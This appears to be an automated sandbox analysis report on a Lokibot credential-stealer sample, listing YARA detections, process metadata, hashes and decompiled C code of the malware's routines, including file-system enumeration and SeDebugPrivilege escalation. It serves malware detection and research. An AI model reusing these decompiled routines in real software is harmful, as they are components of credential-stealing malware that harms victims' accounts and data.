                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: FJbeidnZOF.exe PID: 5472 Parent PID: 5392

                                            General

                                            Start time:09:18:37
                                            Start date:29/04/2021
                                            Path:C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Imagebase:0x540000
                                            File size:653824 bytes
                                            MD5 hash:0B43C829AF2EB773A3614B02BA5B8C5F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Disassembly

                                            Code Analysis

                                            Reset < >

                                              Analysis Process: FJbeidnZOF.exe PID: 5392 Parent PID: 5624 FJbeidnZOF.exeCOMMON

                                              Executed Functions

                                              Function 009794A8, Relevance: .7, Instructions: 665COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0c6e73420aca15fdca9da6d6e18f85bc4dc174b01022ddd57eb970a43782e62
                                              • Instruction ID: a21d8d946d66025d0d6e0ece525d86b0d9a49331e75b6e9815c75505eb599502
                                              • Opcode Fuzzy Hash: f0c6e73420aca15fdca9da6d6e18f85bc4dc174b01022ddd57eb970a43782e62
                                              • Instruction Fuzzy Hash: A6528D32A00619CFCB15CF68C884BAEB7B6FF85304F5584A9E919AB251D774FD85CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097BA50, Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0097BCA6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 2d8b9a3c98e33bf37b91c72541717d24bcc14a2ec8fbcba2f1a5c20f36ce24f8
                                              • Instruction ID: 2e45edc1f49c4d6bd47cb07e79a56b355de915b16296b581b18ff021aeb3332c
                                              • Opcode Fuzzy Hash: 2d8b9a3c98e33bf37b91c72541717d24bcc14a2ec8fbcba2f1a5c20f36ce24f8
                                              • Instruction Fuzzy Hash: F7713571A00B058FDB64DF6AD4457AABBF5BF88304F00892ED58AD7A50DB34E8498B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097AAB8, Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097E02A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 22866c3570fa8cb1734e4e1d3dd56586fb89be934b1e1640578e164c69440ac5
                                              • Instruction ID: 9611408f6b8717dd5c56db00974d8399b5fa4c21f01b9cc1484596b7080d6b0b
                                              • Opcode Fuzzy Hash: 22866c3570fa8cb1734e4e1d3dd56586fb89be934b1e1640578e164c69440ac5
                                              • Instruction Fuzzy Hash: 545103B1D04308DFDB14CFA9D884ADEBBB5FF88314F24852AE419AB251D774A885CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097AAD4, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097E02A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: e4deea049f15f225cbdc4bea2cf978cf6e8121f9c4ea0568173d2760537bc475
                                              • Instruction ID: 1787c4ca8ede46a446dce2e35fd10bc98867f43ad3dd2c84f2a14f77569ce58a
                                              • Opcode Fuzzy Hash: e4deea049f15f225cbdc4bea2cf978cf6e8121f9c4ea0568173d2760537bc475
                                              • Instruction Fuzzy Hash: 6D51DFB1D04308DFDB14CF99C884ADEBBB5FF48314F24852AE819AB210D774A985CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097DF0D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097E02A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: d73e099e4a24324d11a5a9e1541158c11d6898a6a96affdcc147c5e063bfd048
                                              • Instruction ID: 7efb6db5d40dc9a2711c58ee76db2b05519a418ec19ca2f9afe82f27c0910578
                                              • Opcode Fuzzy Hash: d73e099e4a24324d11a5a9e1541158c11d6898a6a96affdcc147c5e063bfd048
                                              • Instruction Fuzzy Hash: 1C51C0B1D00309DFDF14CFA9D984ADEBBB5BF48314F24852AE819AB250D7B49985CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00977009, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00977107
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 82e514702c5aae2ba5211cc25ae43e1226ad767435b2d162c9520d11424af4d1
                                              • Instruction ID: 8a1efa478f26b8e29fe973c1348e38d8a1ced8212bc0a3f81dd1ef654b86b067
                                              • Opcode Fuzzy Hash: 82e514702c5aae2ba5211cc25ae43e1226ad767435b2d162c9520d11424af4d1
                                              • Instruction Fuzzy Hash: 64415776904248DFCF01CFA9D844AEEBBF5EF88310F14806AE954A7361D7349955CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00977080, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00977107
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: ffee03c10b95d64da8c42fa69267fa63d7b9d6630840c4b5bf1bbf1e06c20ae3
                                              • Instruction ID: c558d521581d82a6555cff85a7fb10481da60a281a9f3f10a9c5a163c3b18c35
                                              • Opcode Fuzzy Hash: ffee03c10b95d64da8c42fa69267fa63d7b9d6630840c4b5bf1bbf1e06c20ae3
                                              • Instruction Fuzzy Hash: 1421E4B59042089FDB10CF99D984AEEFBF8FB48320F14841AE918A7350D374A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00977078, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00977107
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f93cd4b6c09c05eaf98c74b69e084a85beba7e399e1606b8168acd252dca03c0
                                              • Instruction ID: fe270990353f61ee854a762a37bf2b1ca2be5a5715c65a03857788dceac86498
                                              • Opcode Fuzzy Hash: f93cd4b6c09c05eaf98c74b69e084a85beba7e399e1606b8168acd252dca03c0
                                              • Instruction Fuzzy Hash: 2D21FFB6900209DFDB00CFA9D984AEEBBF4EB48324F14841AE919B7250D378A954CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097A998, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0097BD21,00000800,00000000,00000000), ref: 0097BF32
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 7c4034ef32e626bff87b4ac24a9f36dee7fcb309e259bb989b8ea353a9d8ad8b
                                              • Instruction ID: a2cf95031772264b3c67fc04bb59fd818fdd50918a2b072c8fb85cf37df65694
                                              • Opcode Fuzzy Hash: 7c4034ef32e626bff87b4ac24a9f36dee7fcb309e259bb989b8ea353a9d8ad8b
                                              • Instruction Fuzzy Hash: 881114B29043088FCB10DF9AD844BDEFBF8EF48714F11842AE519A7240C774A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097BEC0, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0097BD21,00000800,00000000,00000000), ref: 0097BF32
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: f2edc05925c3a66af3d10479c7d55c5b120511a0ca6eb45cc9be1b9c8af8a756
                                              • Instruction ID: 9c873b5f95ef76667afac975b5555514d5dfbbffc6a62163b923c7e70c95db4a
                                              • Opcode Fuzzy Hash: f2edc05925c3a66af3d10479c7d55c5b120511a0ca6eb45cc9be1b9c8af8a756
                                              • Instruction Fuzzy Hash: 921112B69002098FCB10DFAAD984BDEFBF4AB88314F15842AD419B7250C774A949CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097BC40, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0097BCA6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: ec240a43b280faed03a50729f9cdc0eb5098933c082cca5f1b9d8906f8a27dc4
                                              • Instruction ID: 5679228e22e48f185ac44626b8c5a9397eefa92fea4fb9596c764ddff8729ce5
                                              • Opcode Fuzzy Hash: ec240a43b280faed03a50729f9cdc0eb5098933c082cca5f1b9d8906f8a27dc4
                                              • Instruction Fuzzy Hash: 6F11FDB28002498BCB10CF9AD944BDEBBF8AB88324F15C41AD859B7600D778A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097E159, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 0097E1BD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: 4f56d006acc54de88bf110de2adbbf090acc7cf18a9740309a486ebe714dc191
                                              • Instruction ID: 84e65afa0b60229c1e2d142a8a1ec5033927fedbc44afcef068e004194435746
                                              • Opcode Fuzzy Hash: 4f56d006acc54de88bf110de2adbbf090acc7cf18a9740309a486ebe714dc191
                                              • Instruction Fuzzy Hash: E91100B69002089FDB10CF99D985BDEBBF8EB88320F10845AE919B7740D374A945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097E160, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,?,?), ref: 0097E1BD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: 8fdc4d841e00035be57ee636d00a178075f1c54f2d0030bf6162eba106bb03b1
                                              • Instruction ID: fa1724ace2361555682524b23d9189521e8f62514a635f3186d090f65b8291b0
                                              • Opcode Fuzzy Hash: 8fdc4d841e00035be57ee636d00a178075f1c54f2d0030bf6162eba106bb03b1
                                              • Instruction Fuzzy Hash: BD11D0B59002499FDB10CF99D985BDEBBF8EB48324F10845AD919A7740D374A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0097A758, Relevance: .3, Instructions: 265COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 812f8ad6f16c6d84290a39f0b61e01aaa4d6f14ca9acbeb20112529301d0e14e
                                              • Instruction ID: 787098e58a4c848cdc20978b635150eadb050072814b455d41f140f28c75e5f0
                                              • Opcode Fuzzy Hash: 812f8ad6f16c6d84290a39f0b61e01aaa4d6f14ca9acbeb20112529301d0e14e
                                              • Instruction Fuzzy Hash: 37A14E32E002198FCF05DFA5D8446DEBBB6FFC5300B15856AE919BB221EB35A955CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0097C3A0, Relevance: .2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.238470731.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c33696d2635d6ccd726495377053b3bda6e6f4389ada009f3971a3a0472bf83d
                                              • Instruction ID: 75728cd0b5998a831ea7efdac921eb8a4a6455690b235b569af627dcf2e014c8
                                              • Opcode Fuzzy Hash: c33696d2635d6ccd726495377053b3bda6e6f4389ada009f3971a3a0472bf83d
                                              • Instruction Fuzzy Hash: 62C121B182AF45CBE712CF6DEC8418A3B71BB45324F52430AD1616B6F0D7B9144AEF58
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: FJbeidnZOF.exe PID: 5472 Parent PID: 5392 FJbeidnZOF.exeCOMMON

                                              Executed Functions

                                              Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                                              0x00403d82
                                              0x00403d88
                                              0x00403d8c
                                              0x00403d8d
                                              0x00403d90
                                              0x00403ea9
                                              0x00403ea9
                                              0x00403eb9
                                              0x00403ebb
                                              0x00403ec0
                                              0x00403f95
                                              0x00403f95
                                              0x00000000
                                              0x00403f95
                                              0x00403ece
                                              0x00403edb
                                              0x00403edd
                                              0x00403ee2
                                              0x00403f8e
                                              0x00403f8f
                                              0x00000000
                                              0x00403f94
                                              0x00000000
                                              0x00403ee8
                                              0x00403ef8
                                              0x00403f0a
                                              0x00403f12
                                              0x00403f18
                                              0x00403f26
                                              0x00403f28
                                              0x00403f2d
                                              0x00000000
                                              0x00000000
                                              0x00403f33
                                              0x00403f76
                                              0x00403f7c
                                              0x00000000
                                              0x00403f83
                                              0x00403f36
                                              0x00403f3a
                                              0x00000000
                                              0x00403f40
                                              0x00403f0c
                                              0x00403f10
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403f41
                                              0x00403f41
                                              0x00403f4b
                                              0x00403f58
                                              0x00403f5c
                                              0x00403f88
                                              0x00000000
                                              0x00403f8d
                                              0x00403f60
                                              0x00000000
                                              0x00403f60
                                              0x00403ef8
                                              0x00403ee8
                                              0x00403da3
                                              0x00403da9
                                              0x00403ea6
                                              0x00403ea8
                                              0x00000000
                                              0x00403ea8
                                              0x00403db7
                                              0x00403dc4
                                              0x00403dc6
                                              0x00403dcb
                                              0x00403e9d
                                              0x00403e9e
                                              0x00403ea4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403dd1
                                              0x00403dd1
                                              0x00403dd8
                                              0x00000000
                                              0x00000000
                                              0x00403de2
                                              0x00403e12
                                              0x00403e22
                                              0x00403e30
                                              0x00403e36
                                              0x00403e3f
                                              0x00403e44
                                              0x00403e47
                                              0x00403e4a
                                              0x00403e4c
                                              0x00000000
                                              0x00000000
                                              0x00403e63
                                              0x00403e65
                                              0x00403e6a
                                              0x00403e6f
                                              0x00403f64
                                              0x00403f6a
                                              0x00000000
                                              0x00403f71
                                              0x00000000
                                              0x00403e6f
                                              0x00403e26
                                              0x00403e27
                                              0x00403e2e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403e2e
                                              0x00403dea
                                              0x00403df9
                                              0x00000000
                                              0x00000000
                                              0x00403e01
                                              0x00403e10
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403e75
                                              0x00403e7f
                                              0x00403e8c
                                              0x00403e8e
                                              0x00403e97
                                              0x00000000

                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNext
                                              • String ID: %s\%s$%s\*$Program Files$Windows
                                              • API String ID: 1690352074-2009209621
                                              • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                              • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                              0x00406512
                                              0x00406514
                                              0x00406522
                                              0x00406524
                                              0x00406530
                                              0x00406534
                                              0x0040653f
                                              0x0040654e
                                              0x00406552
                                              0x0040655a
                                              0x0040655f
                                              0x0040656d
                                              0x00406570
                                              0x00406573
                                              0x0040657a
                                              0x00406589
                                              0x0040658d
                                              0x00406590
                                              0x00406594
                                              0x00000000
                                              0x0040659a
                                              0x004065a1

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 3615134276-2896544425
                                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                              0x00402b8c
                                              0x00402b92
                                              0x00402b96
                                              0x00402b9e
                                              0x00402ba3
                                              0x00402baa

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                              0x00406077
                                              0x00406082
                                              0x00406085

                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
